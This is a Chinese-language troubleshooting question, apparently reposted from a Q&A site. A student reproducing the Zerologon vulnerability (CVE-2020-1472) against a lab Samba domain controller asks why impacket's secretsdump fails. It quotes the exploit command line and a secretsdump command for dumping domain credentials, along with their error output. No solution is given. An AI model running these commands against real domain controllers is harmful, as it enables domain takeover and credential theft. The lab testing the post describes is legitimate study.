Samba AC DC上的Zerologon POC错误

问题描述

我有一个学校项目,要求我在本地环境中模拟 CVE-2020-1472(Zerologon)。 我目前正在尝试测试github script之后的内容,但是遇到了自那时以来一直无法解决的一些问题。

总结一下,我有一个:

  • Ubuntu 16.04 计算机和 Samba 4.3.8域控制器Active Directory
  • Windows Server 2019 ,加入了我用Samba创建的域 EXAMPLE.COM

我已经进行了几次测试,并且可以通过 POC 的第一部分成功修改“管理员”帐户的密码: ./cve-2020-1472-exploit.py -n EXAMPLE-DC -t 1.2.3.4

尝试运行 impacket 从域中提取一些数据时出现问题:

secretsdump.py -no-pass -just-dc Domain/'DC_NETBIOS_NAME$'@DC_IP_ADDR

它成功登录,但随后我收到此消息:

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] DRSR SessionError: code: 0x20e4 - ERROR_DS_CANT_FIND_EXPECTED_NC - The naming context could not be found.
[*] Something wen't wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...

更新1: 我也尝试使用-use-vss选项,但登录后也失败。

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Searching for NTDS.dit
[-] 'NoneType' object has no attribute 'request'
[*] Cleaning up...

我试图获取有关DRSR SessionError: code: 0x20e4 - ERROR_DS_CANT_FIND_EXPECTED_NC的信息,但是我没有在互联网上找到任何有用的信息。 我希望有人已经遇到此错误或对Active Directory有所了解,因为我真的很困

提前感谢,祝您一周愉快!

更新2:

我在impacket的github上制作了一个post,似乎DRSUAPI方法之前尚未经过针对非Windows AD的测试。因此Secretsdump无法正常工作。

每个页面都提到 SAMBA 是易受攻击的,所以我想知道他们是否真的进行了测试以利用此漏洞,或者仅仅是理论上的假设。

解决方法

暂无找到可以解决该程序问题的有效方法,小编努力寻找整理中!

如果你已经找到好的解决方法,欢迎将解决方案带上本链接一起发送给小编。

小编邮箱:dio#foxmail.com (将#修改为@)

相关问答

错误1:Request method ‘DELETE‘ not supported 错误还原:...
错误1:启动docker镜像时报错:Error response from daemon:...
错误1:private field ‘xxx‘ is never assigned 按Alt...
报错如下,通过源不能下载,最后警告pip需升级版本 Requirem...